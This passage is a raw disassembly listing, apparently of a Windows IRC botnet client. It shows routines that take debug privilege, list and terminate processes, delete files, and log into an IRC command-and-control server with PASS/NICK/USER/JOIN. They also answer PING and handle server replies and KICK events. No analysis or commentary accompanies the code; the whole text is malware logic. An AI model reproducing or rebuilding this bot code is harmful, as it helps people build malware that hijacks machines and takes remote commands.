jmp loc_407200
; ---------------------------------------------------------------------------
loc_40729C: ; CODE XREF: sub_4070E8+125�j
lea eax, [ebp+var_108]
loc_4072A2: ; CODE XREF: sub_4070E8+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_4072C4
test cl, cl
jz short loc_4072C0
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_4072C4
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_4072A2
loc_4072C0: ; CODE XREF: sub_4070E8+1C4�j
xor eax, eax
jmp short loc_4072C9
; ---------------------------------------------------------------------------
loc_4072C4: ; CODE XREF: sub_4070E8+1C0�j
; sub_4070E8+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4072C9: ; CODE XREF: sub_4070E8+1DA�j
test eax, eax
jz short loc_407300
loc_4072CD: ; CODE XREF: sub_4070E8+E9�j
; sub_4070E8+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_433450
test eax, eax
jnz loc_4071A7
xor ebx, ebx
loc_4072E7: ; CODE XREF: sub_4070E8+9D�j
; sub_4070E8+B3�j
push [ebp+var_4]
call esi
loc_4072EC: ; CODE XREF: sub_4070E8+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
loc_4072F9: ; CODE XREF: sub_4070E8+3A�j
; sub_4070E8+46�j ...
xor eax, eax
loc_4072FB: ; CODE XREF: sub_4070E8+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407300: ; CODE XREF: sub_4070E8+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx
push [ebp+var_124]
mov edi, eax
push 8
call dword_433490
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi
push 0
push edi
call ds:dword_41F0BC
test eax, eax
jnz short loc_407345
push edi
call esi
push ebx
call esi
jmp short loc_4072F9
; ---------------------------------------------------------------------------
loc_407345: ; CODE XREF: sub_4070E8+253�j
cmp [ebp+arg_18], 0
jz loc_4073F3
lea eax, [ebp+var_350]
push eax
push ebx
call dword_4334B8
test eax, eax
jz short loc_4073B8
push ebx
call esi
xor esi, esi
loc_407366: ; CODE XREF: sub_4070E8+2B2�j
push 7D0h
call ds:dword_41F000
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call ds:dword_41F0A0
lea eax, [ebp+var_230]
push eax
call ds:dword_41F0B8
test eax, eax
setnz al
test al, al
jnz short loc_4073AA
cmp esi, 5
jl short loc_407366
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073AA: ; CODE XREF: sub_4070E8+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073B8: ; CODE XREF: sub_4070E8+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_4073C4: ; CODE XREF: sub_4070E8+2C0�j
; sub_4070E8+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_4073F3
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_4073F3: ; CODE XREF: sub_4070E8+261�j
; sub_4070E8+2EF�j
xor eax, eax
inc eax
jmp loc_4072FB
sub_4070E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4073FB proc near ; DATA XREF: sub_4078FA+43C7�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_407453
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_407453: ; CODE XREF: sub_4073FB+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_4070E8
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40747C
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_407481
; ---------------------------------------------------------------------------
loc_40747C: ; CODE XREF: sub_4073FB+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_407481: ; CODE XREF: sub_4073FB+7F�j
push eax
call sub_412BB5
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4074A8
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_4074A8: ; CODE XREF: sub_4073FB+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401C33
push [ebp+74h+var_14]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_4073FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4074C6 proc near ; CODE XREF: sub_4078FA+35CA�p
; sub_410FD3+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_41F0C4
mov esi, eax
test esi, esi
jz short loc_4074F8
push 0
push esi
call ds:dword_41F0BC
test eax, eax
jnz short loc_4074F8
push esi
xor edi, edi
call ds:dword_41F034
loc_4074F8: ; CODE XREF: sub_4074C6+1A�j
; sub_4074C6+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4074C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4074FD proc near ; DATA XREF: sub_4078FA+1EC7�o
push esi
xor esi, esi
loc_407500: ; CODE XREF: sub_4074FD+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_4070E8
add esp, 1Ch
push dword_42A450
call ds:dword_41F000
jmp short loc_407500
sub_4074FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40751F proc near ; CODE XREF: sub_40779B+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_412DD0
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40753E: ; CODE XREF: sub_40751F+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40753E
cmp byte_479BB4, 0
jz short loc_407567
push offset byte_479BB4
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_404592
add esp, 0Ch
loc_407567: ; CODE XREF: sub_40751F+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_40E7B0
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_412BB5
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_407595: ; CODE XREF: sub_40751F+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407595
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_4075CD
push [ebp+58h+arg_0]
call dword_4335AC
push 7D0h
call ds:dword_41F000
xor eax, eax
jmp loc_407794
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_40751F+91�j
push edi
jmp loc_40775A
; ---------------------------------------------------------------------------
loc_4075D3: ; CODE XREF: sub_40751F+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_40564B
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_40775A
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_4075FF: ; CODE XREF: sub_40751F+235�j
push offset asc_4246B4 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_413920
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_407629
add [ebp+58h+var_4], 2
jmp short loc_40762E
; ---------------------------------------------------------------------------
loc_407629: ; CODE XREF: sub_40751F+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40762E: ; CODE XREF: sub_40751F+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_412C40
lea eax, [ebp+58h+var_2AC]
push offset asc_4246B0 ; "|"
push eax
call sub_413859
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_407743
loc_407667: ; CODE XREF: sub_40751F+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_412C40
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_407693: ; CODE XREF: sub_40751F+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407693
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4076A3: ; CODE XREF: sub_40751F+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4076A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4076BF: ; CODE XREF: sub_40751F+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4076BF
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_4246B0 ; "|"
push ebx
call sub_413859
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4076DF: ; CODE XREF: sub_40751F+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_4078FA
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_407727
push 0FAh
call ds:dword_41F000
jmp short loc_4076DF
; ---------------------------------------------------------------------------
loc_407727: ; CODE XREF: sub_40751F+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_407790
cmp esi, 0FFFFFFFEh
jz short loc_40778B
cmp esi, 0FFFFFFFFh
jz short loc_407787
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_407667
loc_407743: ; CODE XREF: sub_40751F+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_4075FF
loc_40775A: ; CODE XREF: sub_40751F+AF�j
; sub_40751F+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_433414
test eax, eax
jg loc_4075D3
loc_407787: ; CODE XREF: sub_40751F+215�j
xor eax, eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_40778B: ; CODE XREF: sub_40751F+210�j
xor eax, eax
inc eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_407790: ; CODE XREF: sub_40751F+20B�j
push 2
pop eax
loc_407793: ; CODE XREF: sub_40751F+26A�j
; sub_40751F+26F�j
pop edi
loc_407794: ; CODE XREF: sub_40751F+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40751F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40779B proc near ; CODE XREF: sub_40D1EF+472�p
; DATA XREF: sub_4078FA+296C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_407896
; ---------------------------------------------------------------------------
loc_4077C5: ; CODE XREF: sub_40779B+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42AE68
lea edi, [ebp+var_2C]
push dword_42AE64
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_40E7B0
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_434350
push edi
push eax
call sub_412C40
add esp, 1Ch
push 6
push ebx
push 2
call dword_4334A0
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_434344[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_4078CC
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401CA7
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40751F
add esp, 28h
push esi
mov edi, eax
call dword_4335AC
test edi, edi
jz short loc_407896
cmp edi, ebx
jnz short loc_407891
push 1D4C0h
call ds:dword_41F000
jmp short loc_407896
; ---------------------------------------------------------------------------
loc_407891: ; CODE XREF: sub_40779B+E7�j
cmp edi, 2
jz short loc_4078E7
loc_407896: ; CODE XREF: sub_40779B+25�j
; sub_40779B+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_406B1D
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4077C5
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078CC: ; CODE XREF: sub_40779B+92�j
push esi
call dword_4335AC
call sub_406B46
push 7D0h
call ds:dword_41F000
mov eax, ebx
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078E7: ; CODE XREF: sub_40779B+F9�j
push [ebp+var_34]
call sub_4111AE
pop ecx
push 2
pop eax
loc_4078F3: ; CODE XREF: sub_40779B+12F�j
; sub_40779B+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40779B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078FA proc near ; CODE XREF: sub_40751F+1EC�p
var_2178 = byte ptr -2178h
var_1D78 = byte ptr -1D78h
var_1BE8 = byte ptr -1BE8h
var_19E8 = byte ptr -19E8h
var_18E8 = byte ptr -18E8h
var_17E8 = byte ptr -17E8h
var_15E8 = byte ptr -15E8h
var_15E4 = byte ptr -15E4h
var_14E4 = dword ptr -14E4h
var_14E0 = byte ptr -14E0h
var_13E0 = byte ptr -13E0h
var_1360 = dword ptr -1360h
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = byte ptr -1344h
var_1340 = byte ptr -1340h
var_1240 = byte ptr -1240h
var_123C = byte ptr -123Ch
var_11BC = byte ptr -11BCh
var_117C = byte ptr -117Ch
var_10EC = dword ptr -10ECh
var_10E8 = dword ptr -10E8h
var_10E4 = dword ptr -10E4h
var_10E0 = dword ptr -10E0h
var_10DC = dword ptr -10DCh
var_10D4 = byte ptr -10D4h
var_1054 = byte ptr -1054h
var_FD4 = dword ptr -0FD4h
var_FD0 = dword ptr -0FD0h
var_FCC = dword ptr -0FCCh
var_FC4 = dword ptr -0FC4h
var_FC0 = dword ptr -0FC0h
var_FBC = dword ptr -0FBCh
var_FB4 = dword ptr -0FB4h
var_FB0 = byte ptr -0FB0h
var_FAC = dword ptr -0FACh
var_FA8 = byte ptr -0FA8h
var_F28 = byte ptr -0F28h
var_E28 = byte ptr -0E28h
var_D29 = byte ptr -0D29h
var_D28 = byte ptr -0D28h
var_C28 = dword ptr -0C28h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = dword ptr -0C14h
var_C10 = dword ptr -0C10h
var_C0C = dword ptr -0C0Ch
var_C08 = dword ptr -0C08h
var_C04 = byte ptr -0C04h
var_B84 = dword ptr -0B84h
var_B80 = byte ptr -0B80h
var_B74 = byte ptr -0B74h
var_B70 = byte ptr -0B70h
var_B00 = byte ptr -0B00h
var_A80 = dword ptr -0A80h
var_A7C = dword ptr -0A7Ch
var_A78 = dword ptr -0A78h
var_A74 = dword ptr -0A74h
var_A70 = byte ptr -0A70h
var_A64 = byte ptr -0A64h
var_A54 = dword ptr -0A54h
var_A50 = byte ptr -0A50h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9D0 = byte ptr -9D0h
var_998 = byte ptr -998h
var_990 = byte ptr -990h
var_918 = byte ptr -918h
var_898 = dword ptr -898h
var_894 = dword ptr -894h
var_890 = dword ptr -890h
var_88C = dword ptr -88Ch
var_888 = dword ptr -888h
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_874 = dword ptr -874h
var_870 = byte ptr -870h
var_7F0 = byte ptr -7F0h
var_770 = dword ptr -770h
var_76C = dword ptr -76Ch
var_768 = dword ptr -768h
var_764 = dword ptr -764h
var_760 = dword ptr -760h
var_75C = dword ptr -75Ch
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = byte ptr -74Ch
var_67C = byte ptr -67Ch
var_66C = byte ptr -66Ch
var_648 = byte ptr -648h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = dword ptr -53Ch
var_538 = byte ptr -538h
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = dword ptr -4B0h
var_4AC = byte ptr -4ACh
var_44B = byte ptr -44Bh
var_44A = byte ptr -44Ah
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = dword ptr -444h
var_440 = byte ptr -440h
var_43E = byte ptr -43Eh
var_43C = byte ptr -43Ch
var_43B = byte ptr -43Bh
var_43A = byte ptr -43Ah
var_439 = byte ptr -439h
var_432 = byte ptr -432h
var_410 = byte ptr -410h
var_3F0 = dword ptr -3F0h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = dword ptr -3B4h
var_3B0 = dword ptr -3B0h
var_3AC = byte ptr -3ACh
var_390 = dword ptr -390h
var_38C = byte ptr -38Ch
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_378 = dword ptr -378h
var_374 = byte ptr -374h
var_30C = byte ptr -30Ch
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = dword ptr -0C4h
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2178h
call sub_412DD0
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2E0]
rep stosd
lea eax, [ebp+var_3AC]
push eax
mov [ebp+var_1C], 3
mov [ebp+var_18], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_AC], ebx
call sub_412C40
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_407B7D
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_17E8]
rep stosd
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
lea eax, [ebp+var_17E8]
push offset asc_4246B4 ; " :"
push eax
call sub_413920
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 28h
mov [ebp+var_A4], eax
inc edi
loc_4079BA: ; CODE XREF: sub_4078FA+D4�j
push esi
push ebx
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4079BA
mov ebx, [ebp+var_A4]
xor esi, esi
cmp ebx, esi
jz loc_407B7B
cmp [ebp+var_A0], esi
jz loc_407B7B
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_4AC]
push 1Fh
rep stosd
pop edx
loc_4079FC: ; CODE XREF: sub_4078FA+13A�j
lea ecx, [ebp+edx*4+var_A4]
mov eax, [ecx]
cmp eax, esi
jz short loc_407A33
cmp byte ptr [eax], 2Dh
jnz short loc_407A36
cmp byte ptr [eax+2], 0
jnz short loc_407A36
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A4]
mov [ebp+edi+var_4AC], 1
loc_407A33: ; CODE XREF: sub_4078FA+10D�j
dec edx
jns short loc_4079FC
loc_407A36: ; CODE XREF: sub_4078FA+112�j
; sub_4078FA+118�j
cmp [ebp+var_439], 0
jz short loc_407A46
mov [ebp+var_C], 1
loc_407A46: ; CODE XREF: sub_4078FA+143�j
cmp [ebp+var_43E], 0
jz short loc_407A59
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_407A59: ; CODE XREF: sub_4078FA+153�j
cmp byte ptr [ebx], 0Ah
jz short loc_407A93
push 7Fh
lea eax, [ebp+var_C04]
push ebx
push eax
call sub_412C40
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_E0]
push eax
call sub_412C40
lea eax, [ebp+var_E0]
push offset asc_4264C0 ; "!"
push eax
call sub_413859
add esp, 20h
loc_407A93: ; CODE XREF: sub_4078FA+162�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407AE1
push [ebp+var_A0]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_404592
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_407B7B
loc_407AC9: ; CODE XREF: sub_4078FA+3DA�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_407AD4: ; CODE XREF: sub_4078FA+6D6�j
; sub_4078FA+93C�j ...
push [ebp+arg_4]
call sub_404592
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_407AE1: ; CODE XREF: sub_4078FA+1A7�j
mov edx, [ebp+var_A0]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_407B44
push offset a@ ; "@"
push [ebp+var_98]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_407B7B
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_407DE9
; ---------------------------------------------------------------------------
loc_407B44: ; CODE XREF: sub_4078FA+223�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_407B83
push eax
push dword_42AE68
push dword_42AE64
push [ebp+arg_10]
call sub_40E7B0
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 1Ch
loc_407B7B: ; CODE XREF: sub_4078FA+E0�j
; sub_4078FA+EC�j ...
xor eax, eax
loc_407B7D: ; CODE XREF: sub_4078FA+55�j
inc eax
loc_407B7E: ; CODE XREF: sub_4078FA+172D�j
; sub_4078FA+2E43�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407B83: ; CODE XREF: sub_4078FA+257�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_407B89: ; CODE XREF: sub_4078FA+2D0�j
lea eax, [ebp+var_C04]
mov esi, edi
loc_407B91: ; CODE XREF: sub_4078FA+2B3�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407BB3
test cl, cl
jz short loc_407BAF
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407BB3
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407B91
loc_407BAF: ; CODE XREF: sub_4078FA+2A1�j
xor eax, eax
jmp short loc_407BB8
; ---------------------------------------------------------------------------
loc_407BB3: ; CODE XREF: sub_4078FA+29D�j
; sub_4078FA+2AB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407BB8: ; CODE XREF: sub_4078FA+2B7�j
test eax, eax
jnz short loc_407BC3
mov [ebp+var_20], 1
loc_407BC3: ; CODE XREF: sub_4078FA+2C0�j
add edi, 80h
dec edx
jnz short loc_407B89
mov edi, [ebp+var_A0]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407CD9
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_407BEA: ; CODE XREF: sub_4078FA+396�j
cmp byte ptr [edi], 0
jz loc_407C89
push 7Fh
lea eax, [ebp+var_C04]
push edi
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_98], 0
jz short loc_407C89
mov esi, [ebp+var_98]
lea eax, [ebp+var_E0]
loc_407C1A: ; CODE XREF: sub_4078FA+33C�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407C3C
test cl, cl
